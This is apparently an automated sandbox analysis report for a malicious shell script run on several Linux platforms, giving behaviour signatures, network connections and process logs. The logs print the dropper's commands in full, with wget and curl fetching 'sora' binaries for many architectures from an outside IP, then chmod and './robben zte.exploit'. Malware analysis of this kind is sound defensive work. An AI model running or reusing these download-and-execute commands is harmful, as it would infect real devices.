Analysis Overview
SHA256
f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70
Threat Level: Shows suspicious behavior
The file f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
File and Directory Permissions Modification
Checks CPU configuration
System Network Configuration Discovery
Writes file to tmp directory
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-18 03:05
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-18 03:05
Reported
2024-10-18 03:08
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
1s
Max time network
128s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh | N/A |
Processes
/tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh
[/tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86]
/bin/cat
[cat sora.x86]
/bin/chmod
[chmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF2]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mips]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mips]
/bin/cat
[cat sora.mips]
/bin/chmod
[chmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF2]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86_64]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86_64]
/bin/cat
[cat sora.x86_64]
/bin/chmod
[chmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF2]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i468]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i468]
/bin/cat
[cat sora.i468]
/bin/chmod
[chmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF2]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i686]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i686]
/bin/cat
[cat sora.i686]
/bin/chmod
[chmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF2]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mpsl]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mpsl]
/bin/cat
[cat sora.mpsl]
/bin/chmod
[chmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF2]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm4]
/bin/cat
[cat sora.arm4]
/bin/chmod
[chmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF2]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm5]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm5]
/bin/cat
[cat sora.arm5]
/bin/chmod
[chmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF2]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm6]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm6]
/bin/cat
[cat sora.arm6]
/bin/chmod
[chmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF2]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm7]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm7]
/bin/cat
[cat sora.arm7]
/bin/chmod
[chmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF2]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc]
/bin/cat
[cat sora.ppc]
/bin/chmod
[chmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF2]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc440fp]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc440fp]
/bin/cat
[cat sora.ppc440fp]
/bin/chmod
[chmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF2]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.m68k]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.m68k]
/bin/cat
[cat sora.m68k]
/bin/chmod
[chmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF2]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.sh4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.sh4]
/bin/cat
[cat sora.sh4]
/bin/chmod
[chmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF2]
/tmp/robben
[./robben zte.exploit]
Network
| Country | Destination | Domain | Proto |
| NL | 93.123.85.141:80 | tcp | |
| N/A | 224.0.0.251:5353 | udp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| GB | 89.187.167.9:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.62:443 | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-18 03:05
Reported
2024-10-18 03:08
Platform
debian9-armhf-20240418-en
Max time kernel
11s
Max time network
12s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh | N/A |
Processes
/tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh
[/tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86]
/bin/cat
[cat sora.x86]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mips]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mips]
/bin/cat
[cat sora.mips]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86_64]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86_64]
/bin/cat
[cat sora.x86_64]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i468]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i468]
/bin/cat
[cat sora.i468]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i686]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i686]
/bin/cat
[cat sora.i686]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mpsl]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mpsl]
/bin/cat
[cat sora.mpsl]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm4]
/bin/cat
[cat sora.arm4]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm5]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm5]
/bin/cat
[cat sora.arm5]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm6]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm6]
/bin/cat
[cat sora.arm6]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm7]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm7]
/bin/cat
[cat sora.arm7]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc]
/bin/cat
[cat sora.ppc]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc440fp]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc440fp]
/bin/cat
[cat sora.ppc440fp]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.m68k]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.m68k]
/bin/cat
[cat sora.m68k]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M]
/tmp/robben
[./robben zte.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.sh4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.sh4]
/bin/cat
[cat sora.sh4]
/bin/chmod
[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M]
/tmp/robben
[./robben zte.exploit]
Network
| Country | Destination | Domain | Proto |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp |
Files
memory/783-1-0xb677d000-0xb678e044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-18 03:05
Reported
2024-10-18 03:08
Platform
debian9-mipsbe-20240418-en
Max time kernel
27s
Max time network
25s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
